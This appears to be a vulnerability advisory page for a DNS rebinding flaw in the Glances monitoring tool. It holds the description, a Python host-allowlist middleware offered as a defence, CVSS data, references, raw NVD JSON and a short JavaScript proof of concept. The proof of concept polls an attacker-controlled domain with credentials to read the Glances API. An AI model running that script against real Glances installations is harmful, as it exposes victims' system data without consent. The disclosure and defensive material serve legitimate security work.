Security Vulnerability Report
CVE-2026-32632 CVSS 5.9 MEDIUM

CVE-2026-32632

Published: 2026-03-18 18:16:29
Last Modified: 2026-03-19 19:06:36

Description

Glances is an open-source, cross-platform system monitoring tool. Glances recently added DNS rebinding protection for the MCP endpoint, but prior to version 4.5.2, the main REST/WebUI FastAPI application still accepts arbitrary `Host` headers and does not apply `TrustedHostMiddleware` or an equivalent host allowlist. As a result, the REST API, WebUI, and token endpoint remain reachable through attacker-controlled domains in classic DNS rebinding scenarios. Once the victim browser has rebound the attacker domain to the Glances service, same-origin policy no longer protects the API because the browser considers the rebinding domain to be the origin. This is a distinct issue from the previously reported default CORS weakness. CORS is not required for exploitation here because DNS rebinding causes the victim browser to treat the malicious domain as same-origin with the rebinding target. Version 4.5.2 contains a patch for the issue.
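A defender-side illustration of the missing control, added here and not taken from the Glances code base or its patch: a pure-ASGI wrapper that rejects any request whose `Host` header is not on an allowlist, the kind of check the description says was absent. `ALLOWED_HOSTS`, `monitor.internal.example`, `HostAllowlist`, the demo app and `status_for` are assumptions made for the example; port 61208 and `/api/3/cpu` are the values that appear in the PoC on this page.

```python
import asyncio

# Assumption: the names/addresses operators really use to reach the service.
ALLOWED_HOSTS = {"localhost", "127.0.0.1", "::1", "monitor.internal.example"}


def normalize_host(raw):
    """Lower-cased hostname from a Host header value, port removed."""
    raw = raw.strip().lower()
    if raw.startswith("["):  # bracketed IPv6 literal, e.g. [::1]:61208
        end = raw.find("]")
        return raw[1:end] if end != -1 else ""
    return raw.rsplit(":", 1)[0] if ":" in raw else raw


def host_allowed(raw, allowed=ALLOWED_HOSTS):
    # After rebinding, the browser still sends the attacker's name in Host,
    # so an exact-match allowlist rejects it even though the IP is ours.
    host = normalize_host(raw).rstrip(".")  # treat "localhost." as "localhost"
    return bool(host) and host in allowed


class HostAllowlist:
    """Pure-ASGI wrapper that refuses requests before the app sees them."""
    def __init__(self, app, allowed=ALLOWED_HOSTS):
        self.app, self.allowed = app, allowed

    async def __call__(self, scope, receive, send):
        # Only the http scope is checked here; a websocket route needs the same test.
        raw = dict(scope.get("headers", [])).get(b"host", b"").decode("latin-1")
        if scope["type"] != "http" or host_allowed(raw, self.allowed):
            return await self.app(scope, receive, send)
        await send({"type": "http.response.start", "status": 400, "headers": []})
        await send({"type": "http.response.body", "body": b"Invalid host header"})


async def _demo_app(scope, receive, send):  # constructed stand-in for the API
    await send({"type": "http.response.start", "status": 200, "headers": []})
    await send({"type": "http.response.body", "body": b'{"cpu": 3.1}'})


def status_for(host_header):  # one constructed GET through the wrapper
    sent = []
    async def send(msg): sent.append(msg)
    async def receive(): return {"type": "http.request", "body": b""}
    scope = {"type": "http", "path": "/api/3/cpu",
             "headers": [(b"host", host_header.encode("latin-1"))]}
    asyncio.run(HostAllowlist(_demo_app)(scope, receive, send))
    return sent[0]["status"]
```

The allowlist has to contain every name or address that legitimate users type into the browser, otherwise they receive the 400 as well.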

CVSS Details

CVSS Score: 5.9
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:nicolargo:glances:*:*:*:*:*:*:*:* - VULNERABLE
Glances < 4.5.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```javascript
// CVE-2026-32632 DNS Rebinding PoC (Conceptual)
// This PoC demonstrates the DNS rebinding attack concept

// Step 1: Attacker sets up DNS that first resolves to attacker server, then to target
// Domain: attacker-controlled-domain.com
// Initial TTL: Very short (e.g., 1 second)
// DNS A record: Points to attacker server first, then target IP

// Step 2: Victim visits attacker's page with this JavaScript
const targetUrl = 'http://attacker-controlled-domain.com:61208/api/3/cpu';

async function exploit() {
  try {
    // First request - will hit attacker server (bypasses CORS if needed)
    const response = await fetch(targetUrl, {
      credentials: 'include' // Include cookies/tokens
    });
    const data = await response.json();
    console.log('Glances API Response:', data);
    // Extract sensitive data or perform actions
    document.getElementById('result').innerHTML = JSON.stringify(data);
  } catch (error) {
    console.error('Attack failed:', error);
  }
}

// Poll for data after DNS rebinding occurs
setInterval(exploit, 1000);

// Step 3: After DNS TTL expires, the domain now resolves to target Glances server
// Browser considers it same-origin, sends auth cookies/tokens
// Attacker can now access Glances API with victim's credentials
```

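References

https://github.com/nicolargo/glances/commit/5850c564ee10804fdf884823b9c210eb954dd1f9 - Patch
https://github.com/nicolargo/glances/releases/tag/v4.5.2 - Release Notes
https://github.com/nicolargo/glances/security/advisories/GHSA-hhcg-r27j-fhv9 - Exploit, Vendor Advisory
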
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32632", "sourceIdentifier": "[email protected]", "published": "2026-03-18T18:16:28.760", "lastModified": "2026-03-19T19:06:36.183", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Glances is an open-source system cross-platform monitoring tool. Glances recently added DNS rebinding protection for the MCP endpoint, but prior to version 4.5.2, the main REST/WebUI FastAPI application still accepts arbitrary `Host` headers and does not apply `TrustedHostMiddleware` or an equivalent host allowlist. As a result, the REST API, WebUI, and token endpoint remain reachable through attacker-controlled domains in classic DNS rebinding scenarios. Once the victim browser has rebound the attacker domain to the Glances service, same-origin policy no longer protects the API because the browser considers the rebinding domain to be the origin. This is a distinct issue from the previously reported default CORS weakness. CORS is not required for exploitation here because DNS rebinding causes the victim browser to treat the malicious domain as same-origin with the rebinding target. Version 4.5.2 contains a patch for the issue."}, {"lang": "es", "value": "Glances es una herramienta de monitoreo de sistema de código abierto multiplataforma. Glances añadió recientemente protección contra DNS rebinding para el endpoint MCP, pero antes de la versión 4.5.2, la aplicación principal FastAPI REST/WebUI todavía acepta encabezados 'Host' arbitrarios y no aplica 'TrustedHostMiddleware' o una lista de permitidos de host equivalente. Como resultado, la API REST, la WebUI y el endpoint de token permanecen accesibles a través de dominios controlados por el atacante en escenarios clásicos de DNS rebinding. Una vez que el navegador víctima ha reasociado el dominio del atacante al servicio Glances, la política de mismo origen ya no protege la API porque el navegador considera que el dominio de reasociación es el origen. 
Este es un problema distinto de la debilidad CORS predeterminada reportada anteriormente. CORS no es necesario para la explotación aquí porque el DNS rebinding hace que el navegador víctima trate el dominio malicioso como de mismo origen con el objetivo de rebinding. La versión 4.5.2 contiene un parche para el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-346"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nicolargo:glances:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.5.2", "matchCriteriaId": "3FC19E01-80F1-43BB-912C-39FE99143A59"}]}]}], "references": [{"url": "https://github.com/nicolargo/glances/commit/5850c564ee10804fdf884823b9c210eb954dd1f9", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-hhcg-r27j-fhv9", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-hhcg-r27j-fhv9", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}